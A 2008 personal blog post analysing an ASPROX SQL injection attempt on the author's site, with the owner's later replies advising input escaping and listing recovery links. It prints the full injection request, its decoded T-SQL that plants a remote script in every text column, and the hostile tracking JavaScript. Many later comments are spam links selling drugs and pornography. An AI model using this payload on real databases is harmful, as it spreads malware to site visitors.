User Menu

Information

Registering with our User Community enables you to access even more...

Join now for free!

Welcome to the site!

Journal: SQL Injection Attack

Pointless but irritating attacks on me

Table of Contents

Nuclear Power • 24.7.2011 I've never known the answers to the big questions about energy. I do know that with … [read more - comment]signgam Error Compiling plotutils-2.6 • 15.9.2010 I was just compiling the GNU plotutils library (version 2.6) using MSYS for MinGW, and had the… [read more - comment]Art & Aesthetics • 28.6.2010 The following is taken from a 'Note' I wrote on Facebook in February 2009. I thought I'd repost… [read more - comment]No Competition • 18.2.2010 The Conservatives are proposing a form of free market education, based largely according to… [read more - comment]New Politics • 17.2.2010 I went to see Ken Livingstone today. Ken Livingstone is an interesting man . He is… [read more - comment]
« Ahmadinejad and The Ventriloquist — Here — A Modern(ish) Comedy - VB6 and ADO »
Saturday, 9 August 2008

SQL Injection Attack

Pointless but irritating attacks on me C Comment

Some computer network is trying to SQL-inject stuff (include JavaScript files) into this website, using an oldish (April or earlier) exploit, aimed at ASP and T-SQL. Chinese (mainly Beijing, actually, amusingly), American, Canadian, even Belgian server are using a certain GET request to spread what I think is a csrss-style virus.

The GET request is 

/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

which translates as an attempt to inject SQL of 

DECLARE @S CHAR(4000);
SET @S=CAST(0x4445... AS CHAR(4000));
EXEC(@S);

The long hexadecimal string is 

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Which is to say, into every string field everywhere, append an inclusion of the JavaScript script http://sdo.1000mg.cn/csrss/w.js which looks like this: 

window.onerror=function(){return true;}
if(typeof(js86eus)=="undefined")
{
var js86eus=1;
var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');
var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=100 height=0 src=http://www.plgou.com/csrss/new.htm></iframe>");
}else{
}
}
function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}
 

So there we go.

Edit: ASPROX

I have just discovered the name of this attack: originally, and probably still, this was part of the so-called ASPROX attack. See http://hostmonsterforums.com/showthread.php?t=3949 for background, and http://www.networkcloaking.com/ASPROX_Toolkit.pdf for an excessive analysis of both the attack and various fixes.

Also, http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx has a fix (see its comments too).

The recommended starting point for anyone dealing with this, or merely interested in it, is certainly this July Guardian Technology blog (skip the intro and read the bottom bits). Also, this Microsoft Security Advisory has several useful links under Suggested Actions and then Additional Information.

Rant

Just as a general comment: people, SQL Injection is a stupid standard line of attack which ALL SOFTWARE run on all computers should defend against. All forms, all URL GET requests - if it goes to the server, escape it! We should have stopped this _years_ ago. Yet ASP seems to make it very difficult to fix, and some server-side software packages seem to ship with this blindingly serious error. Which can effectively allow someone complete control of the whole MySQL server, and (if this app isn't chrooted to a chroot jail and otherwise contained) of the whole logical server.

For the love of God people, ESCAPE

Posted by carl at 00:00

Filed under: Computing

Comments

Commenting is open.

There are currently 26 comments. Say your piece.

(Unverified) nacho @ 2008-08-11 18:21:00 # lol script kiddies
Carl Turner @ 2008-08-13 18:11:06 # - Administrator Comment Quite. Not even original.
(Unverified) Bonny @ 2008-08-17 09:54:34 # Hi Carl

Our site was attacked by this <insert swear-word here> as well.. I found your blog through googling for '419214144', the 51yes click account it seems. We have since removed the entries from the SQL database. It seems that you know what you are doing and are a notch or ten superior to us. :-) in securing a server since you did not get hacked. Do you have any tips on preventing this from happening again?

Thanks heaps in advance!
Bonny
Carl Turner @ 2008-08-18 00:14:59 # - Administrator Comment {SEE THE EDIT ABOVE!}

Hi Bonny; no need to go around calling me superior. That's just rude :)

The solution is simple to implement IF you have scripts access:

1) THE GOLDEN RULE of DATABASES: ESCAPE! Information from the user, you assume it isn't safe. In PHP, there are functions such as mysql_real_escape_string. In ASP, with which I have basically no experience, the task appears less automated. Escaping is replacing special sequences - here the ' quote symbol - with 'safe' versions which are treated as normal text. Typically, this is \' (i.e. backslashing it) or '' (i.e. doubling the offending character). I don't know which is correct in your SQL dialect.

Try http://msdn.microsoft.com/en-us/library/ms998271.aspx for starters. Google for things like "asp sanitize escape".

2) Don't let long queries through either.

As I'm running MySQL (accessed by my PHP scripts) this wouldn't have any effect anyway, since e.g. the DECLARE keyword doesn't exist.
(Unverified) Bonny @ 2008-08-18 01:29:29 # Hi Carl
Well, I am 42 and you are 16 and I am vastly impressed by your stuff. I tried to read up on infinite fields last night and got a headache :-)
So I will stop calling you superior and wil just simply refer to you as 'cool dude'. :-)

Thanks for pointing us into the right direction. The web used to be such an easy and peacful place in 1996... :-)

Thanks again,
B
Carl Turner @ 2008-08-18 01:58:52 # - Administrator Comment Bonny: "infinite fields"? Where do I talk about "infinite fields" here? I will, when I start getting round to populating the old Maths and Quantum Mechanics article sections, but... unless you're prophetic...
(Unverified) Bonny @ 2008-08-18 06:05:03 # Hi
blush blush. I mean finite fields, not infinite fields. I could have said that anybody who talks about finite fields needs to look at clones of polynomials over infinite fields of prime characteristic just to keep it all in balance blah blah
but really I just made a typo.
B
(Unverified) noelia sex tape @ 2011-08-23 04:36:54 # I have the same., <a href= http://www.freewebs.com/noeliasextape >noelia sex tape online</a>, [url= http://www.freewebs.com/noeliasextape ]noelia sex tape online[/url], 056,
(Unverified) buy tramadol for you @ 2012-04-10 19:55:16 # Is it so important?, <a href= http://buytramadoless.springnote.com/pages/11232206 >buy tramadol</a>, [url= http://buytramadoless.springnote.com/pages/11232206 ]buy tramadol[/url], %((,
(Unverified) Cheapest buy adipex @ 2012-04-12 01:46:20 # Thank you, <a href= http://buyadipexs.blogdiario.com >buy adipex discount</a>, [url= http://buyadipexs.blogdiario.com ]buy adipex discount[/url], :-P,
(Unverified) hookup today price @ 2012-04-26 22:15:30 # I like your work!, <a href= http://intensedebate.com/people/hookuptodayi#1 >hookup today price</a> [url=http://intensedebate.com/people/hookuptodayi#1]hookup today price[/url], edunl,
(Unverified) hookup web sites @ 2012-04-26 22:33:08 # :-(, http://intensedebate.com/people/hookupwebsites Best hookup web sites, ioekkd,
(Unverified) nude hookup @ 2012-04-27 14:09:22 # best for you, http://intensedebate.com/people/nudehookupe nude hookup, xumrf,
(Unverified) xxx date @ 2012-04-28 02:50:14 # Give somebody the to a site about the, <a href= http://intensedebate.com/people/xxxdateo >xxx date</a>, [url= http://intensedebate.com/people/xxxdateo ]xxx date[/url], 774883,
(Unverified) xxx date site now @ 2012-04-28 02:58:56 # Hi, http://intensedebate.com/people/xxxdatesitee xxx date site, >:-),
(Unverified) percocet @ 2012-05-10 11:01:04 # So where it to find, <a href= http://percocet.createblog.com#1 >percocet</a> [url=http://percocet.createblog.com#1]percocet[/url], 29135,
(Unverified) coach purses @ 2012-05-12 23:18:37 # :-), <a href= http://coachpurses.springnote.com/pages/11603862 >Cheap coach purses</a>, [url= http://coachpurses.springnote.com/pages/11603862 ]Cheap coach purses[/url], 8-(((,
(Unverified) bactrim discount @ 2012-05-13 09:45:32 # Nise site, <a href= http://bactrim.blogdiario.com >bactrim discount</a>, [url= http://bactrim.blogdiario.com ]bactrim discount[/url], %-[,
(Unverified) darvocet free @ 2012-05-13 15:54:58 # Give somebody the to a site about the, <a href= http://darvocet.blogdiario.com#1 >darvocet</a> [url=http://darvocet.blogdiario.com#1]darvocet[/url], vtmkkl,
(Unverified) buy viagra online @ 2012-05-14 05:37:23 # :-(, http://buyviagraonlines.blogdiario.com First buy viagra online, 8]],
(Unverified) Discount aricept @ 2012-05-14 22:16:53 # Best Wishes, <a href= http://aricept.blogdiario.com#1 >aricept price</a> [url=http://aricept.blogdiario.com#1]aricept price[/url], 319,
(Unverified) buy adderall online @ 2012-05-16 10:38:32 # I like it so much, <a href= http://knowyourmeme.com/users/buyadderallonline--2#1 >buy adderall online online</a> [url=http://knowyourmeme.com/users/buyadderallonline--2#1]buy adderall online online[/url], bhyrm,
(Unverified) cheap cigarettes @ 2012-05-17 14:23:43 # can you do thi for me, http://www.scribd.com/cheapcigarettes cheap cigarettes, 483,
(Unverified) coach purses for you @ 2012-05-18 02:03:42 # I have the same., http://dailybooth.com/coachpurses coach purses for you, miswwv,
(Unverified) First buy tramadol @ 2012-05-18 08:40:09 # I bookmarked this guestbook., <a href= http://dailybooth.com/buytramadols >buy tramadol</a>, [url= http://dailybooth.com/buytramadols ]buy tramadol[/url], %OOO,
(Unverified) buy celexa online @ 2012-05-19 08:51:31 # Best, <a href= http://buycelexaonline.blogdiario.com#1 >buy celexa online now</a> [url=http://buycelexaonline.blogdiario.com#1]buy celexa online now[/url], >:-],

:

HTML tags are not allowed, but pressing return does create a new line.

:

SuchIdeas - thought for food. This site is proudly designed by Carl Turner, working as the suchideas.com web designer.
Cache misses: 1 of 2